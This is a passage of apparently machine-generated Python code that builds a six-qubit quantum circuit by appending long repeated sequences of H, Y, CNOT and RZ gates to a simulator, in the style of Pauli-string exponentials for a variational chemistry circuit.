sim.append(sim.RZ(0.9386544, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.H(4))
sim.append(sim.Y(3))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.H(5))
sim.append(sim.H(2))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.247019, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.H(5))
sim.append(sim.H(2))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.Y(5))
sim.append(sim.Y(2))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.247019, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.Y(5))
sim.append(sim.Y(2))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.H(5))
sim.append(sim.Y(2))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.247019, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.H(5))
sim.append(sim.Y(2))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.Y(5))
sim.append(sim.H(2))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.247019, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.Y(5))
sim.append(sim.H(2))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.Y(5))
sim.append(sim.Y(2))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.247019, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.Y(5))
sim.append(sim.Y(2))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.H(5))
sim.append(sim.H(2))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.247019, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.H(5))
sim.append(sim.H(2))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.Y(5))
sim.append(sim.H(2))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.247019, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.Y(5))
sim.append(sim.H(2))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.H(5))
sim.append(sim.Y(2))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.247019, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.H(5))
sim.append(sim.Y(2))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.H(5))
sim.append(sim.H(3))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(3.290294, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.H(5))
sim.append(sim.H(3))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.Y(5))
sim.append(sim.Y(3))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(3.290294, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.Y(5))
sim.append(sim.Y(3))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.H(5))
sim.append(sim.Y(3))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(3.290294, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.H(5))
sim.append(sim.Y(3))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.Y(5))
sim.append(sim.H(3))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(3.290294, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.Y(5))
sim.append(sim.H(3))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.Y(5))
sim.append(sim.Y(3))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(3.290294, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.Y(5))
sim.append(sim.Y(3))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.H(5))
sim.append(sim.H(3))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(3.290294, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.H(5))
sim.append(sim.H(3))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.Y(5))
sim.append(sim.H(3))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(3.290294, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.Y(5))
sim.append(sim.H(3))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.H(5))
sim.append(sim.Y(3))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(3.290294, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.H(5))
sim.append(sim.Y(3))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.H(5))
sim.append(sim.H(3))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.769559, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.H(5))
sim.append(sim.H(3))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.Y(5))
sim.append(sim.Y(3))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.769559, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.Y(5))
sim.append(sim.Y(3))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.H(5))
sim.append(sim.Y(3))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.769559, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.H(5))
sim.append(sim.Y(3))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.Y(5))
sim.append(sim.H(3))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.769559, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.Y(5))
sim.append(sim.H(3))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.Y(5))
sim.append(sim.Y(3))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.769559, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.Y(5))
sim.append(sim.Y(3))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.H(5))
sim.append(sim.H(3))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.769559, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.H(5))
sim.append(sim.H(3))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.Y(5))
sim.append(sim.H(3))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.769559, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.Y(5))
sim.append(sim.H(3))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.H(5))
sim.append(sim.Y(3))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.769559, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.H(5))
sim.append(sim.Y(3))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.H(5))
sim.append(sim.H(3))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(5.048614, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.H(5))
sim.append(sim.H(3))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.Y(5))
sim.append(sim.Y(3))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(5.048614, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.Y(5))
sim.append(sim.Y(3))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.H(5))
sim.append(sim.Y(3))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(5.048614, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.H(5))
sim.append(sim.Y(3))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.Y(5))
sim.append(sim.H(3))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(5.048614, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.Y(5))
sim.append(sim.H(3))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.Y(5))
sim.append(sim.Y(3))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(5.048614, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.Y(5))
sim.append(sim.Y(3))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.H(5))
sim.append(sim.H(3))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(5.048614, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.H(5))
sim.append(sim.H(3))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.Y(5))
sim.append(sim.H(3))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(5.048614, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.Y(5))
sim.append(sim.H(3))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.H(5))
sim.append(sim.Y(3))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(5.048614, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.H(5))
sim.append(sim.Y(3))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.H(5))
sim.append(sim.H(4))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(4.302892, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(4, 1))
sim.append(sim.CX(5, 4))
sim.append(sim.H(5))
sim.append(sim.H(4))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.Y(5))
sim.append(sim.Y(4))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(4.302892, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(4, 1))
sim.append(sim.CX(5, 4))
sim.append(sim.Y(5))
sim.append(sim.Y(4))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.H(5))
sim.append(sim.Y(4))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(4.302892, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(4, 1))
sim.append(sim.CX(5, 4))
sim.append(sim.H(5))
sim.append(sim.Y(4))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.Y(5))
sim.append(sim.H(4))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(4.302892, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(4, 1))
sim.append(sim.CX(5, 4))
sim.append(sim.Y(5))
sim.append(sim.H(4))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.Y(5))
sim.append(sim.Y(4))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(4.302892, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(4, 1))
sim.append(sim.CX(5, 4))
sim.append(sim.Y(5))
sim.append(sim.Y(4))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.H(5))
sim.append(sim.H(4))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(4.302892, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(4, 1))
sim.append(sim.CX(5, 4))
sim.append(sim.H(5))
sim.append(sim.H(4))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.Y(5))
sim.append(sim.H(4))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(4.302892, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(4, 1))
sim.append(sim.CX(5, 4))
sim.append(sim.Y(5))
sim.append(sim.H(4))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.H(5))
sim.append(sim.Y(4))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(4.302892, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(4, 1))
sim.append(sim.CX(5, 4))
sim.append(sim.H(5))
sim.append(sim.Y(4))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.H(5))
sim.append(sim.H(4))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(0.9926059, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(5, 4))
sim.append(sim.H(5))
sim.append(sim.H(4))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.Y(5))
sim.append(sim.Y(4))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(0.9926059, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(5, 4))
sim.append(sim.Y(5))
sim.append(sim.Y(4))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.H(5))
sim.append(sim.Y(4))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(0.9926059, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(5, 4))
sim.append(sim.H(5))
sim.append(sim.Y(4))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.Y(5))
sim.append(sim.H(4))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(0.9926059, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(5, 4))
sim.append(sim.Y(5))
sim.append(sim.H(4))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.Y(5))
sim.append(sim.Y(4))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(0.9926059, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(5, 4))
sim.append(sim.Y(5))
sim.append(sim.Y(4))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.H(5))
sim.append(sim.H(4))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(0.9926059, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(5, 4))
sim.append(sim.H(5))
sim.append(sim.H(4))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.Y(5))
sim.append(sim.H(4))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(0.9926059, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(5, 4))
sim.append(sim.Y(5))
sim.append(sim.H(4))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.H(5))
sim.append(sim.Y(4))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(0.9926059, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(5, 4))
sim.append(sim.H(5))
sim.append(sim.Y(4))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.H(5))
sim.append(sim.H(4))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(0.6762655, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(5, 4))
sim.append(sim.H(5))
sim.append(sim.H(4))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.Y(5))
sim.append(sim.Y(4))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(0.6762655, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(5, 4))
sim.append(sim.Y(5))
sim.append(sim.Y(4))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.H(5))
sim.append(sim.Y(4))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(0.6762655, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(5, 4))
sim.append(sim.H(5))
sim.append(sim.Y(4))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.Y(5))
sim.append(sim.H(4))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(0.6762655, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(5, 4))
sim.append(sim.Y(5))
sim.append(sim.H(4))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.Y(5))
sim.append(sim.Y(4))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(0.6762655, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(5, 4))
sim.append(sim.Y(5))
sim.append(sim.Y(4))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.H(5))
sim.append(sim.H(4))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(0.6762655, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(5, 4))
sim.append(sim.H(5))
sim.append(sim.H(4))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.Y(5))
sim.append(sim.H(4))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(0.6762655, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(5, 4))
sim.append(sim.Y(5))
sim.append(sim.H(4))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.H(5))
sim.append(sim.Y(4))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(0.6762655, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(5, 4))
sim.append(sim.H(5))
sim.append(sim.Y(4))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.H(5))
